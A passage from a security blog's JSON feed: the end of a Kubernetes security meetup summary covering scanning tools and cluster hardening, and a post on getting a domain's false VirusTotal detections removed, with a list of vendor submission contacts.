Secure):</strong> He demonstrated dumping secrets from all namespaces via <code>kubectl</code> and passing them to KICS. The resulting scan report clearly highlighted exposed secrets (e.g., <code>k8svaultapikey</code> and <code>k8swebhookapikey</code>), proving its utility in finding hardcoded credentials in configurations.\n<div class=\"diagram-container\">\n<figure>\n  <img decoding=\"async\" loading=\"lazy\" class=\"diagram-img img_ev3q\" src=\"https://raw.githubusercontent.com/haxnation/blog/main/blog/param-jasani/breachforce-meetup/imgs/kicksscan-output.png\" alt=\"KICS scan report indicating exposed configuration secrets\">\n  <figcaption class=\"diagram-caption\">\n    <strong>Fig 7:</strong> KICS scan report indicating exposed configuration secrets\n  </figcaption>\n</figure>\n</div></li>\n</ul>\n\n<ul>\n<li class=\"\"><strong>Kube-bench:</strong> He then ran <code>kube-bench</code> to evaluate the cluster against CIS Kubernetes Benchmarks. The tool highlighted specific security postures (PASS, FAIL, WARN) for various components, such as whether API server token expiration was properly configured or if profiling was disabled on the controller manager.\n<div class=\"diagram-container\">\n<figure>\n  <img decoding=\"async\" loading=\"lazy\" class=\"diagram-img img_ev3q\" src=\"https://raw.githubusercontent.com/haxnation/blog/main/blog/param-jasani/breachforce-meetup/imgs/kubebench-output.png\" alt=\"kube-bench audit checks against CIS benchmarks\">\n  <figcaption class=\"diagram-caption\">\n    <strong>Fig 8:</strong> kube-bench audit checks against CIS benchmarks\n  </figcaption>\n</figure>\n</div></li>\n</ul>\n\n<ul>\n<li class=\"\"><strong>Kubescape:</strong> Finally, he ran a <code>kubescape scan</code>, summarizing the overall security posture of the cluster and identifying misconfigurations against established security frameworks. He showed various results returned from Kubescape, highlighting what was not enabled on the control plane and detailing compliance scores. He then specifically ran <code>kubescape scan framework mitre</code> to evaluate the cluster against the MITRE ATT&amp;CK framework, highlighting high-severity findings such as \"Applications credentials in configuration files\" (with compliance score details), \"List Kubernetes secrets\", and \"Writable hostPath mount\".\n<div class=\"diagram-container\">\n<figure>\n  <img decoding=\"async\" loading=\"lazy\" class=\"diagram-img img_ev3q\" src=\"https://raw.githubusercontent.com/haxnation/blog/main/blog/param-jasani/breachforce-meetup/imgs/kubescape-scan-output.png\" alt=\"Kubescape scan security posture results\">\n  <figcaption class=\"diagram-caption\">\n    <strong>Fig 9:</strong> Kubescape scan security posture results\n  </figcaption>\n</figure>\n</div></li>\n</ul>\n\n<ul>\n<li class=\"\"><strong>Grype:</strong> He also briefly ran <code>grype</code> (e.g., <code>grype alpine:latest</code>), which is a vulnerability scanner for container images and filesystems. This tool is essential for identifying CVEs (Common Vulnerabilities and Exposures) within the base images and packages running in your cluster before they can be exploited.\n<div class=\"diagram-container\">\n<figure>\n  <img decoding=\"async\" loading=\"lazy\" class=\"diagram-img img_ev3q\" src=\"https://raw.githubusercontent.com/haxnation/blog/main/blog/param-jasani/breachforce-meetup/imgs/grype-output.png\" alt=\"Grype container image vulnerability scan output\">\n  <figcaption class=\"diagram-caption\">\n    <strong>Fig 10:</strong> Grype container image vulnerability scan output\n  </figcaption>\n</figure>\n</div></li>\n</ul>\n\n<hr>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"kubernetes-hardening--security\">Kubernetes Hardening &amp; Security<a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#kubernetes-hardening--security\" class=\"hash-link\" aria-label=\"Direct link to Kubernetes Hardening &amp; Security\" title=\"Direct link to Kubernetes Hardening &amp; Security\" translate=\"no\">​</a></h3>\n<p>To conclude the session, Abhishek moved back to the slideshow to discuss fundamental Kubernetes hardening and security concepts.</p>\n<p>The golden rule underlying all these concepts is simple: <mark><strong>Follow the \"Principle of least privilege.\"</strong></mark></p>\n<p>He outlined several key areas for securing a cluster, including Open Policy Agent (OPA), Network Policies, Secrets management, and most notably, Pod Security Policies.</p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"pod-security-policy-psp\">Pod Security Policy (PSP)<a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#pod-security-policy-psp\" class=\"hash-link\" aria-label=\"Direct link to Pod Security Policy (PSP)\" title=\"Direct link to Pod Security Policy (PSP)\" translate=\"no\">​</a></h4>\n<p>A Pod Security Policy (PSP) is a cluster-level resource that controls the security-related attributes of pods, specifically managing container privilege levels. Key guidelines when defining a PSP include:</p>\n<ul>\n<li class=\"\"><strong>Do not run application processes as root:</strong> Ensure containers run as non-root users.</li>\n<li class=\"\"><strong>Do not allow privilege escalation:</strong> Prevent child processes from gaining more privileges than their parent.</li>\n<li class=\"\"><strong>Use a read-only root filesystem:</strong> Mitigate the impact of a compromised container by preventing file writes.</li>\n<li class=\"\"><strong>Use the default (masked) <code>/proc</code> filesystem mount:</strong> Protect sensitive kernel parameters.</li>\n<li class=\"\"><strong>Do not use the host network or process space:</strong> Isolate the container from the underlying node's network and process ID namespaces.</li>\n<li class=\"\"><strong>Drop unused and unnecessary Linux capabilities:</strong> Strip away any capabilities the application doesn't strictly need (e.g., dropping <code>NET_RAW</code> if ping isn't required).</li>\n<li class=\"\"><strong>Service Account control:</strong> Tightly manage what service accounts are mounted into pods.</li>\n</ul>\n<blockquote>\n<p><strong>Crucial Note on Pod Security Policies</strong></p>\n<p>When a PSP resource is created, <em>it does nothing</em> on its own. You must explicitly authorize it using <strong>RBAC (Role-Based Access Control)</strong> for it to take effect!</p>\n</blockquote>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"open-policy-agent-opa--gatekeeper\">Open Policy Agent (OPA) / Gatekeeper<a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#open-policy-agent-opa--gatekeeper\" class=\"hash-link\" aria-label=\"Direct link to Open Policy Agent (OPA) / Gatekeeper\" title=\"Direct link to Open Policy Agent (OPA) / Gatekeeper\" translate=\"no\">​</a></h4>\n<p>While PSPs are great for Pod-level security, what if you need to control fields in other resources or enforce complex, custom logic? This is where <strong>Open Policy Agent (Gatekeeper)</strong> comes in.</p>\n<p>Gatekeeper acts as a customizable admission controller. It gives you the ability to:</p>\n<ul>\n<li class=\"\">Enforce required labels on all resources.</li>\n<li class=\"\">Mandate a required resources section (CPU/Memory limits).</li>\n<li class=\"\">Mutate container images to always point to an internal corporate image registry.</li>\n<li class=\"\">Set strict node and pod affinity/anti-affinity selectors to Deployments.</li>\n<li class=\"\">Essentially, you can enforce <em>anything</em> that you want to see (or not see) in your Kubernetes configurations.</li>\n</ul>\n<p><strong>Example: Restricting Image Registries</strong>\nAbhishek showed an example of a Gatekeeper constraint (<code>K8sAllowedRepos</code>) designed to enforce the use of only allowed container registries (e.g., <code>openpolicyagent/</code> and <code>myregistry.com/</code>). When a user attempts to run a pod with an unapproved image (<code>kubectl run my-pod --image=nginx</code>), the admission webhook intercepts the request and strictly denies it, returning a \"Forbidden\" error.</p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"network-policies\">Network Policies<a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#network-policies\" class=\"hash-link\" aria-label=\"Direct link to Network Policies\" title=\"Direct link to Network Policies\" translate=\"no\">​</a></h4>\n<p>If OPA is your configuration enforcer, a <strong>Network Policy</strong> is your internal cluster firewall.</p>\n<p>By default in Kubernetes, pods can communicate freely with each other. Network Policies allow you to lock this down by explicitly defining <strong>Ingress</strong> (incoming) and <strong>Egress</strong> (outgoing) traffic rules at the Namespace or Pod level.</p>\n<ul>\n<li class=\"\"><strong>Default Deny:</strong> The best practice is to implement a \"Default Deny\" policy that blocks all traffic, and then explicitly allow only what is necessary.</li>\n<li class=\"\"><strong>Granular Control:</strong> You can restrict traffic based on IP blocks, namespaces, or specific pod labels.\n<ul>\n<li class=\"\"><em>Ingress Example:</em> Allowing traffic to a <code>webapp</code> pod only on ports 80 and 443 from specific internal IP subnets.</li>\n<li class=\"\"><em>Egress Example:</em> Restricting outbound traffic so a pod can only resolve DNS (UDP port 53 to <code>kube-dns</code>) and cannot arbitrarily reach out to the internet or other namespaces.</li>\n</ul>\n</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"secrets-management\">Secrets Management<a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#secrets-management\" class=\"hash-link\" aria-label=\"Direct link to Secrets Management\" title=\"Direct link to Secrets Management\" translate=\"no\">​</a></h4>\n<p>Abhishek posed an important question: <em>\"Where do I version control my secrets?\"</em></p>\n<ul>\n<li class=\"\">In his slides, he joked about bad solutions like \"Paper / USB / CD / Two fireproof safes?\" ~caught my eye :)</li>\n<li class=\"\">The actual solution: Integrate an external KMS (Key Management System) like <strong>HashiCorp Vault</strong> (or Consul).</li>\n<li class=\"\"><strong>How it works:</strong> Rather than storing secrets plainly in <code>etcd</code>, you configure the Kubernetes API server to encrypt secrets at rest using a transit encryption key managed by Vault (via a <code>vault-kubernetes-kms</code> provider).</li>\n<li class=\"\"><em>Reference:</em> He recommended checking out the official <a href=\"https://developer.hashicorp.com/vault/tutorials/kubernetes-introduction/vault-secrets-operator\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">HashiCorp Vault Secrets Operator tutorial</a>.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"securing-the-core-cluster-components\">Securing the Core Cluster Components<a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#securing-the-core-cluster-components\" class=\"hash-link\" aria-label=\"Direct link to Securing the Core Cluster Components\" title=\"Direct link to Securing the Core Cluster Components\" translate=\"no\">​</a></h4>\n<p>Finally, he ran through rapid-fire configurations for hardening the critical components of the Kubernetes cluster itself:</p>\n<ul>\n<li class=\"\"><strong>API Server:</strong>\n<ul>\n<li class=\"\">By default, it might listen on an insecure port (8080) where requests bypass all authentication and authorization checks.</li>\n<li class=\"\"><em>Fix:</em> Close the insecure port by setting the <code>--insecure-port</code> flag to <code>0</code>, and ensure <code>--insecure-bind-address</code> is not set.</li>\n</ul>\n</li>\n<li class=\"\"><strong>etcd:</strong>\n<ul>\n<li class=\"\">This backend database is critical and must be secured.</li>\n<li class=\"\"><em>Fix:</em> Close its insecure ports similarly. Crucially, the etcd server should be configured to <em>only</em> trust certificates assigned to API servers.</li>\n</ul>\n</li>\n<li class=\"\"><strong>Kubelet:</strong>\n<ul>\n<li class=\"\">The agent responsible for launching pods.</li>\n<li class=\"\"><em>Fix:</em> Disable anonymous access (<code>--anonymous-auth=false</code>). Ensure requests are authorized by setting <code>--authorization-mode=Webhook</code> (avoiding <code>AlwaysAllow</code>) and strictly defining the CA certificate (<code>--client-ca-file=/etc/kubernetes/pki/ca.crt</code>).</li>\n</ul>\n</li>\n<li class=\"\"><strong>Kubernetes Dashboard:</strong>\n<ul>\n<li class=\"\">Historically a prime target for attackers.</li>\n<li class=\"\"><em>Fix:</em> Allow only authenticated access (known users), enforce RBAC to limit user privileges strictly to what they need, and <strong>never</strong> expose the dashboard to the public internet unless you are absolutely sure of what you are doing.</li>\n</ul>\n</li>\n</ul>\n<p><strong>Control Plane Ports to Monitor:</strong>\nHe also shared a quick reference table of control plane ports. A good quick-check is to try <code>curl</code>ing these ports to ensure they are properly secured:</p>\n<ul>\n<li class=\"\"><strong>6443 / 8080 (TCP Inbound):</strong> Kubernetes API Server</li>\n<li class=\"\"><strong>2379, 2380 (TCP Inbound):</strong> etcd server client API</li>\n<li class=\"\"><strong>10250 (TCP Inbound):</strong> Kubelet API</li>\n<li class=\"\"><strong>10251 (TCP Inbound):</strong> kube-scheduler</li>\n<li class=\"\"><strong>10252 (TCP Inbound):</strong> kube-controller-manager</li>\n<li class=\"\"><strong>10258 (TCP Inbound):</strong> Kubernetes-controller-manager (Optional)</li>\n</ul>\n<hr>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"additional-tooling-for-kubernetes-security\">Additional Tooling for Kubernetes Security<a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#additional-tooling-for-kubernetes-security\" class=\"hash-link\" aria-label=\"Direct link to Additional Tooling for Kubernetes Security\" title=\"Direct link to Additional Tooling for Kubernetes Security\" translate=\"no\">​</a></h3>\n<p>As a final takeaway, Abhishek provided a rapid-fire list of essential tools that can help audit, secure, and monitor Kubernetes environments:</p>\n<ul>\n<li class=\"\"><strong>Trivy:</strong> A comprehensive vulnerability scanner for containers and artifacts.</li>\n<li class=\"\"><strong>Grype:</strong> A vulnerability scanner specifically for container images and filesystems.</li>\n<li class=\"\"><strong>KICS (Keeping Infrastructure as Code Secure):</strong> Finds security vulnerabilities and misconfigurations in IaC.</li>\n<li class=\"\"><strong>Kubescape:</strong> A Kubernetes security posture management tool that tests if a cluster is deployed securely against frameworks like NSA and MITRE.</li>\n<li class=\"\"><strong>Kubectl:</strong> The indispensable Kubernetes command-line tool.</li>\n<li class=\"\"><strong>kubiscan:</strong> A tool to scan Kubernetes clusters for risky permissions and RBAC issues.</li>\n<li class=\"\"><strong>Kube-hunter:</strong> Hunts for security weaknesses in Kubernetes clusters from an attacker's perspective.</li>\n<li class=\"\"><strong>Kube-bench:</strong> Checks whether Kubernetes is deployed securely according to CIS benchmarks.</li>\n<li class=\"\"><strong>kubeaudit:</strong> A command-line tool to audit a cluster for various security concerns (e.g., checking if containers run as non-root, use read-only root filesystems, drop scary capabilities, and don't run privileged). It directly points out missing annotations like AppArmor or problematic default ServiceAccount token mounts.</li>\n<li class=\"\"><strong>kube-score:</strong> Performs static code analysis of your Kubernetes object definitions with recommendations for improved reliability and security.</li>\n<li class=\"\"><strong>Checkov:</strong> A static code analysis tool for infrastructure as code.</li>\n<li class=\"\"><strong>Kubesec:</strong> A Kubectl plugin for scanning pods, deployments, daemonsets, and statefulsets that suggests specific improvements (e.g., dropping <code>CAP_SYS_ADMIN</code> or forcing <code>runAsNonRoot</code>).</li>\n<li class=\"\"><strong>kubesploit:</strong> A cross-platform post-exploitation HTTP/2 Command &amp; Control server and agent for Kubernetes environments.</li>\n</ul>",
            "url": "https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary",
            "title": "Summary of Breachforce Meetup, Mumbai held on 21st June 2026",
            "summary": "This blog is a summary of talk held at Breachforce Meetup, Mumbai held on 21st June 2026.\n",
            "date_modified": "2026-06-21T19:00:00.000Z",
            "author": {
                "name": "Param Jasani",
                "url": "https://github.com/param-jasani"
            },
            "tags": [
                "Docker",
                "K8s",
                "Kubernetes",
                "Containers",
                "Pods",
                "Breachforce-Meetup-Mumbai-Summary"
            ]
        },
        {
            "id": "https://haxnation.github.io/blog/vt-fp",
            "content_html": "<p>One morning, our domain appeared on VirusTotal with detections from nine security vendors. This is the story of how we investigated the issue, reached out to the vendors, and ultimately got the false positives cleared.</p>\n<style>\n.diagram-container {\n  display: flex;\n  justify-content: center;\n  margin: 2rem 0;\n}\n\n.diagram-container figure {\n  text-align: center;\n}\n\n.diagram-img {\n  max-width: 100%;\n  height: auto;\n}\n</style>\n<p><em>A story of the day our domain was flagged by over 9 security vendors on VirusTotal and how we contacted the vendors to get the false positives removed.</em></p>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"how-it-started\">How It Started<a href=\"https://haxnation.github.io/blog/vt-fp#how-it-started\" class=\"hash-link\" aria-label=\"Direct link to How It Started\" title=\"Direct link to How It Started\" translate=\"no\">​</a></h2>\n<p>On <strong>31st May 2026</strong>, we shared one of our blog posts in our community group. Shortly after, one of our community members reached out and mentioned that they were unable to open our website because <strong>Bitdefender</strong> was flagging the domain as malicious.</p>\n<p>Our founder immediately looked into the issue and scanned the domain on VirusTotal. To our surprise, the domain had been flagged by <strong>more than 9 security vendors</strong>.</p>\n<div class=\"diagram-container\">\n  <figure>\n    <img decoding=\"async\" loading=\"lazy\" class=\"diagram-img img_ev3q\" src=\"https://raw.githubusercontent.com/haxnation/blog/main/blog/param-jasani/misc/imgs/vt-fp-flag.png\" alt=\"VirusTotal False Positives on our domain.\">\n    <figcaption class=\"diagram-caption\">\n      <strong>Fig 1.1:</strong> haxnation.org domain was flagged by over 9 security vendors on VirusTotal.\n    </figcaption>\n  </figure>\n</div>\n<p>And that's when his hunt began.</p>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"finding-a-way-to-clear-the-detections\">Finding a Way to Clear the Detections<a href=\"https://haxnation.github.io/blog/vt-fp#finding-a-way-to-clear-the-detections\" class=\"hash-link\" aria-label=\"Direct link to Finding a Way to Clear the Detections\" title=\"Direct link to Finding a Way to Clear the Detections\" translate=\"no\">​</a></h2>\n<p>After some digging, Our founder discovered that there isn't a central \"remove false positive\" button on VirusTotal.</p>\n<p>Instead, you need to <strong>contact each security vendor individually and submit a false positive report</strong> for review.</p>\n<p>He then pinged me and asked me to continue from there and resolve the issue.</p>\n<p>So I started searching for every vendor's submission portal, support page, email address, and any available process for reporting false positives.</p>\n<p>To save others from going through the same research, I've listed all the resources we used below.</p>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"security-vendors-and-false-positive-submission-resources\">Security Vendors and False Positive Submission Resources<a href=\"https://haxnation.github.io/blog/vt-fp#security-vendors-and-false-positive-submission-resources\" class=\"hash-link\" aria-label=\"Direct link to Security Vendors and False Positive Submission Resources\" title=\"Direct link to Security Vendors and False Positive Submission Resources\" translate=\"no\">​</a></h2>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<table><thead><tr><th>Vendor</th><th>False Positive Submission Method</th></tr></thead><tbody><tr><td>Kaspersky</td><td><a href=\"https://opentip.kaspersky.com/\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://opentip.kaspersky.com/</a></td></tr><tr><td>Fortinet</td><td><a href=\"https://www.fortiguard.com/webfilter\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://www.fortiguard.com/webfilter</a></td></tr><tr><td>Bitdefender</td><td><a href=\"https://www.bitdefender.com/consumer/support/answer/29358/\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://www.bitdefender.com/consumer/support/answer/29358/</a></td></tr><tr><td>CRDF Labs</td><td><a href=\"https://threatcenter.crdf.fr/false_positive.html#false-positive-form\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://threatcenter.crdf.fr/false_positive.html#false-positive-form</a></td></tr><tr><td>G DATA</td><td><a href=\"https://www.gdata.de/help-en/general/GeneralInformation/submitFileAppURL/\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://www.gdata.de/help-en/general/GeneralInformation/submitFileAppURL/</a></td></tr><tr><td>Lionic</td><td><a href=\"https://www.lionic.com/supports/report-false-positive/\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://www.lionic.com/supports/report-false-positive/</a></td></tr><tr><td>Sophos</td><td><a href=\"https://support.sophos.com/support/s/filesubmission?language=en_US\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://support.sophos.com/support/s/filesubmission?language=en_US</a></td></tr><tr><td>Adminus</td><td>Email: <a href=\"mailto:samples@adminus.net\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">samples@adminus.net</a></td></tr><tr><td>CyRadar</td><td><a href=\"https://cyradar.com/reportfp/\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://cyradar.com/reportfp/</a></td></tr></tbody></table>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"notes-for-specific-vendors\">Notes for Specific Vendors<a href=\"https://haxnation.github.io/blog/vt-fp#notes-for-specific-vendors\" class=\"hash-link\" aria-label=\"Direct link to Notes for Specific Vendors\" title=\"Direct link to Notes for Specific Vendors\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"kaspersky\">Kaspersky<a href=\"https://haxnation.github.io/blog/vt-fp#kaspersky\" class=\"hash-link\" aria-label=\"Direct link to Kaspersky\" title=\"Direct link to Kaspersky\" translate=\"no\">​</a></h3>\n<p>For Kaspersky, we used their Threat Intelligence portal:</p>\n<p><a href=\"https://opentip.kaspersky.com/\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://opentip.kaspersky.com/</a></p>\n<p>You need to enter your domain, fetch the results, and then submit a request for reanalysis. The process is explained in detail here:</p>\n<p><a href=\"https://support.kaspersky.com/kaspersky-for-windows/21.25/troubleshooting/other/1870\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://support.kaspersky.com/kaspersky-for-windows/21.25/troubleshooting/other/1870</a></p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"adminus\">Adminus<a href=\"https://haxnation.github.io/blog/vt-fp#adminus\" class=\"hash-link\" aria-label=\"Direct link to Adminus\" title=\"Direct link to Adminus\" translate=\"no\">​</a></h3>\n<p>For Adminus, there isn't a dedicated false positive submission portal.</p>\n<p>Instead, send an email to:</p>\n<p><strong><a href=\"mailto:samples@adminus.net\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">samples@adminus.net</a></strong></p>\n<p>Use the subject line:</p>\n<p><strong>False Positive Request for [domain-name]</strong></p>\n<p>and include details about the detection along with the domain you want reviewed.</p>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"additional-resources-aggregated-from-public-sources--not-personally-tested\">Additional Resources (Aggregated from Public Sources – Not Personally Tested)<a href=\"https://haxnation.github.io/blog/vt-fp#additional-resources-aggregated-from-public-sources--not-personally-tested\" class=\"hash-link\" aria-label=\"Direct link to Additional Resources (Aggregated from Public Sources – Not Personally Tested)\" title=\"Direct link to Additional Resources (Aggregated from Public Sources – Not Personally Tested)\" translate=\"no\">​</a></h2>\n<p><strong>Note:</strong> The vendors and links below were aggregated from community resources (such as the <a href=\"https://github.com/yaronelh/False-Positive-Center\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">False-Positive-Center GitHub repo</a>, <a href=\"https://tickets.onehoursitefix.com/kb/faq.php?id=163\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">OneHourSiteFix</a> guides, and other public references). These are <strong>not</strong> part of our personal experience and have <strong>not been tested</strong> by us. Links and processes can change over time, so always verify on the vendor's site and use a professional email. Include your VirusTotal link, exact detection name, and a clear explanation that it's a legitimate site.</p>\n<p>Official contact list from VT if you can't find anything on vendors - <a href=\"https://docs.virustotal.com/docs/false-positive-contacts\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://docs.virustotal.com/docs/false-positive-contacts</a></p>\n<blockquote>\n<p>Note that these lists from GitHub, VT and OneHourSiteFix are not updated, they can be used as a fallback if you can't find anything on the vendor.</p>\n</blockquote>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<table><thead><tr><th>Vendor</th><th>False Positive Submission Method</th></tr></thead><tbody><tr><td>Avast</td><td><a href=\"https://www.avast.com/report-false-positive\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://www.avast.com/report-false-positive</a></td></tr><tr><td>AVG</td><td><a href=\"https://www.avg.com/false-positive-file-form\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://www.avg.com/false-positive-file-form</a> or <a href=\"https://www.avg.com/us-en/whitelist\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://www.avg.com/us-en/whitelist</a></td></tr><tr><td>Avira</td><td><a href=\"https://www.avira.com/en/analysis/submit\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://www.avira.com/en/analysis/submit</a> (or URL-specific: <a href=\"https://www.avira.com/en/analysis/submit-url\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://www.avira.com/en/analysis/submit-url</a>)</td></tr><tr><td>Acronis</td><td>Email: <a href=\"mailto:virustotal-falsepositive@acronis.com\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">virustotal-falsepositive@acronis.com</a></td></tr><tr><td>AhnLab</td><td>Email: <a href=\"mailto:v3sos@ahnlab.com\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">v3sos@ahnlab.com</a> (recommended) or Email: <a href=\"mailto:samples@ahnlab.com\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">samples@ahnlab.com</a></td></tr><tr><td>AlphaMountain.ai</td><td><a href=\"https://www.alphamountain.ai/false-positive/\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://www.alphamountain.ai/false-positive/</a></td></tr><tr><td>Arcabit</td><td>Email: <a href=\"mailto:vt.fp@arcabit.pl\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">vt.fp@arcabit.pl</a></td></tr><tr><td>ClamAV</td><td><a href=\"https://www.clamav.net/reports/fp\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://www.clamav.net/reports/fp</a></td></tr><tr><td>Dr.Web</td><td><a href=\"https://vms.drweb.com/sendvirus/\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://vms.drweb.com/sendvirus/</a> or <a href=\"https://support.drweb.com/new/urlfilter/?lng=en\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://support.drweb.com/new/urlfilter/?lng=en</a></td></tr><tr><td>Emsisoft</td><td><a href=\"https://www.emsisoft.com/en/support/submit/\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://www.emsisoft.com/en/support/submit/</a> or Email: <a href=\"mailto:fp@emsisoft.com\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">fp@emsisoft.com</a></td></tr><tr><td>ESET</td><td>Email: <a href=\"mailto:samples@eset.com\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">samples@eset.com</a></td></tr><tr><td>F-Secure / WithSecure</td><td><a href=\"https://www.f-secure.com/en/business/support-and-downloads/submit-a-sample\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://www.f-secure.com/en/business/support-and-downloads/submit-a-sample</a></td></tr><tr><td>Forcepoint</td><td>Email: <a href=\"mailto:suggest@forcepoint.com\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">suggest@forcepoint.com</a></td></tr><tr><td>Google Safe Browsing</td><td><a href=\"https://safebrowsing.google.com/safebrowsing/report_error/?hl=en\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://safebrowsing.google.com/safebrowsing/report_error/?hl=en</a></td></tr><tr><td>Gridinsoft</td><td><a href=\"https://gridinsoft.com/incorrect-detection\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://gridinsoft.com/incorrect-detection</a> or Email: <a href=\"mailto:virus@gridinsoft.com\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">virus@gridinsoft.com</a></td></tr><tr><td>Ikarus</td><td>Email: <a href=\"mailto:fp@ikarus.at\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">fp@ikarus.at</a></td></tr><tr><td>Malwarebytes</td><td><a href=\"https://support.malwarebytes.com/hc/en-us/articles/360038524154-Report-a-false-positive-to-Malwarebytes-Support\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://support.malwarebytes.com/hc/en-us/articles/360038524154-Report-a-false-positive-to-Malwarebytes-Support</a></td></tr><tr><td>Palo Alto Networks</td><td><a href=\"https://live.paloaltonetworks.com/t5/virustotal/bd-p/VirusTotal_Discussions\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://live.paloaltonetworks.com/t5/virustotal/bd-p/VirusTotal_Discussions</a></td></tr></tbody></table>\n<p><strong>Additional Tips (from aggregated sources):</strong></p>\n<ul>\n<li class=\"\">Use <strong>domain[.]com</strong> format in emails to avoid spam filters.</li>\n<li class=\"\">For vendors that share engines/signatures (e.g., some smaller ones use Bitdefender, Avira, or ClamAV), submitting to the main engine may help multiple detections.</li>\n<li class=\"\">Always start with a fresh <strong>VirusTotal URL scan</strong> to see the current list of flagging vendors.</li>\n<li class=\"\">Be patient as some vendors respond in hours, others take days or weeks.</li>\n</ul>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-result\">The Result<a href=\"https://haxnation.github.io/blog/vt-fp#the-result\" class=\"hash-link\" aria-label=\"Direct link to The Result\" title=\"Direct link to The Result\" translate=\"no\">​</a></h2>\n<p>After submitting false positive reports to all the vendors that had flagged our domain, we waited for their review.\nWithin few hours, the detections started disappearing one by one.</p>\n<p>And within <strong>48 hours</strong>, all our queries were solved.</p>\n<p>By the end of the process, our domain had been cleaned and was no longer being flagged by the vendors that had initially marked it as malicious.</p>\n<div class=\"diagram-container\">\n  <figure>\n    <img decoding=\"async\" loading=\"lazy\" class=\"diagram-img img_ev3q\" src=\"https://raw.githubusercontent.com/haxnation/blog/main/blog/param-jasani/misc/imgs/vt-domain-clean.png\" alt=\"VirusTotal results after our queries were resolved showing our domain was clean.\">\n    <figcaption class=\"diagram-caption\">\n      <strong>Fig 1.2:</strong> VirusTotal results after our queries were resolved showing our domain was clean.\n    </figcaption>\n  </figure>\n</div>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"final-thoughts\">Final Thoughts<a href=\"https://haxnation.github.io/blog/vt-fp#final-thoughts\" class=\"hash-link\" aria-label=\"Direct link to Final Thoughts\" title=\"Direct link to Final Thoughts\" translate=\"no\">​</a></h2>\n<p>If your domain is being flagged on VirusTotal, don't panic.</p>\n<p>In many cases, the detections may simply be false positives. The key is to identify which vendors are flagging your domain and then submit review requests directly to those vendors.</p>\n<p>Hopefully, this expanded list of resources saves you even more time. And also thank you to all the teams on 